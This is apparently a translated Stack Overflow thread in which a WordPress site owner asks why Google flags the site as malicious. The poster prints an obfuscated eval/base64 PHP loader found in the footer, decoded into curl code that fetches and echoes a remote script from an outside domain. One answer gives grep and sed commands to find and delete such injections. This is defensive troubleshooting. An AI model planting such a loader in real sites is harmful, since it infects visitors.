【问题标题】:Malware in website flagged by google谷歌标记的网站中的恶意软件
【发布时间】:2015-10-27 21:30:09
【问题描述】:

以下是被谷歌检测为恶意软件的链接截图:

我正在开发一个网站ExclusivelyHybrid

它有与之相关的广告词。突然,谷歌将该网站列入黑名单,并说他们的服务器被该网站的恶意软件攻击。

在网站扫描仪上交叉检查,未发现恶意软件。

让谷歌扫描它,他们也没有在网站上发现任何恶意软件。 然后要求hostgator对其进行深度扫描,他们也没有发现任何恶意软件。

Google 同意再次启动 adword 活动,但他们再次受到恶意软件的攻击并将该网站列入黑名单。

hostgator 的一名编码人员检查了该网站,发现了 3 个导致问题的链接。

我有链接,但点击它们后电脑会被感染(我应该在这里分享链接吗?)

我已经搜索了整个源代码和站点的所有 javascript,没有找到这样的链接。

任何人都可以提供有关这些链接的位置和文件的建议吗?

这是我在网站页脚中找到的内容:

<?php error_reporting(0); eval(base64_decode(ZXZhbChiYXNlNjRfZGVjb2RlKFpYWmhiQ2hpWVhObE5qUmZaR1ZqYjJSbEtGcFlXbWhpUTJocFdWaE9iRTVxVW1aYVIxWnFZakpTYkV0R2NGbFhiV2hwVVRKb2NGZFdhRTlpUlRWeFZXMWFZVkl4V25GWmFrcFRZa1YwUmxSc2FHbFNla1pOVldwR2RtVkdiSFJOVlRsT1VqQmFXVlF4YUZkWFZURnpWMVJDV2xadGFGQlVWV1JQVGxadmVVNVdjRTVOVm04eFYxZDBXazVYVGtoVGJsSnBVa1ZLVEZwV1pEQmtNVVY1V2toT1QwMUZOWFZaVkVKM1V6Rk9SMWRxVmxwaE1EVkRWREZXYzFKR1RuUlBWM1JVVW10dmVsWkVTbkpPUjFKMFVtNVNVMkZyY0dGV01GcExZekZyZVUxSVpHeFNXR2d4VlZkd1QxUlZNWFZSYlRsaFVucEdSMXBITVVka1ZrcHhVbTFHV0ZKWE9IaFdSVnBUVW0xU1ZrNVlRazlUU0VKT1dXeFNSMlF4YkhSaGVrWnFWakEwTVZVeFVtdFNSbTk1WkVWMFZHRXlVbEJaYWtKelVsVXhTRnBHY0U1TlZtOHhWMWQwV2s1WFRraFRibEpwVWtWS1RWVlVTbnBOTVVWNVdraEtWR0V6UWtwV1Z6VkRZVlpaZUZkcVNtRlNiV2hUVjJwR1ExWkdSbFZTYkVKclRXcHNURlZVUm10VU1ERllWRzVTYkZJeGNIRlVWM2hhWkRGc2NWUnJUazVTV0ZKRlZsY3hkMkZHUlhwaFJWWlhZa1p3VEZaR1dsSmxSa1p6Vm14c1RsWnNjRlZXYTFaUFRUSkZlVlZzYkZSaWF6Vk5WbXRvVDFSR1JYaFNiazVvWWxaS1dsVXlOVTlY.VlRCM1RsaE9ZVkpYVFRGYVJFcFRVa1p2ZVdSR2NFNWlWMUkyVmxaU1IxWXhWWGhWYTFwUVZtdGFXRlZ0Y0hOV1JsWnpWMnhPVjJKR1dubFViRnBYVm0xRmQxZHNRbGRXUlVwb1ZXMTRWMk5IVVhwaFJYaFhVMFUxVFZWVVJrZGpNa1owVld4c1ZHSnJOVnBVVkVFeFl6RndSbGw2Vm10TmJFcEZWMnBLTUZkck1YUmFTSEJXVmtWYVdGWlVSbE5TYXpsWFVteGtVMkZ0ZUVaV2ExSkNUVlpSZUZOc1dsVmlSbHBZVld4a05GUXhWbk5XVkZaWC5Za1p3UlZwRVNqQmhNVWw1WlVSQ1dHSkhUVEZVVm1SVFVrZEdObHBGVW1GTmJsSk1WVEowYTFVeVJraFZhMmhUVmpKU1VsWlVRa3RqVm5CSFlVVjBhazFYWkRWV2JYQlRXVlpaZDAxWVdsUmhNbEpRV1dwQ01GWlhUWGRrUlZKV1ZqTm9lRmRyV205VE1rMTRXak5zVldKck5YQlVWRUV4WXpGTmQxUnNUbWhpVlZwRldWaHdhMUpHYjNsa1JYUllZa2RTVUZscVNrdE9Wa1pZWWtWMFUwMVZjSFpYYTFaclVtMUdWazlVVG1sTlNFSjBWbFpqTkdORmRGVmplV3R3VDNjcEtUcykpOw)); ?>

解码为:

if(function_exists('curl_init'))
{
    $url = "http://javaterm1.pw/java/jquery-1.6.3.min.js";
    $ch = curl_init();
    $timeout = 5;
    curl_setopt($ch,CURLOPT_URL,$url);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,$timeout);
    $data = curl_exec($ch);
    curl_close($ch);
    echo "$data";
}

【问题讨论】:

  • 是的。一旦我访问您的网站,我就会被重定向到工作中被过滤的内容。检查你的脚本!
  • 您可以分享显示链接的屏幕截图(图片)。建议您注意文件最后修改日期。不需要修改且在同一日期修改的文件,很可能被感染了
  • 仅作记录。 -1 在退出时弹出。
  • 这是客户要求的,所以不得不说。

标签: javascript html wordpress malware


【解决方案1】:

肯定在该网站上有可疑行为。我刚刚被重定向到一个欺诈性“骗局”“你是我们在 Firefox 上的第 100 位访问者”。

我没有按任何按钮或任何东西。

寻找插入的 Javascript 代码,从头开始插入一个基本的 HTML 页面,看看问题是否仍然存在。

【讨论】:

  • 这里也一样。我得到了重定向。
  • 不会发生在第二次连接上,也许他们给了我一个 cookie 来注册我已经“赢得”
  • 我正在编辑带有 url 截图的帖子。但是正如你们都说重定向..这不会发生在我的浏览器中我使用的是 chrome
  • @YashThakur 您访问一次后似乎没有重定向。听起来它正在将谁添加到不“重试”的白名单中,这样当 you webdev 来尝试解决它时它是相当透明的。
【解决方案2】:

不要使用网站扫描仪。它们不能正常工作。 您必须查看您的访问日志。

在查看日志之前,您可以使用 shell。 搜索这个字符串:

rgrep 'eval(gzinflate(base64_decode' * -l

如果你发现了什么,你可以用这个字符串删除它:

find ./ -type f -exec sed -i '/eval(gzinflate(base64_decode/d' {} \;

删除访问日志后,重新启动 apache,如果恶意软件又回来了,请查看访问日志。 就我而言,恶意软件就在那里:

[30/Jul/2015:11:57:13 +0200] "POST /wp-content/themes/skeleton/404.php

【讨论】:

  • 是的,我的网站上有一些带有 basecode64 的东西
  • 那是恶意软件.. 到处删除它!如果恶意软件再次出现,您必须在访问日志中进行搜索。
  • 我已经编辑了帖子并编写了我在我的网站上找到的 base64 代码,你能告诉我它是否是恶意软件吗?
猜你喜欢
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
  • 2018-10-14
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
  • 1970-01-01
相关资源
最近更新 更多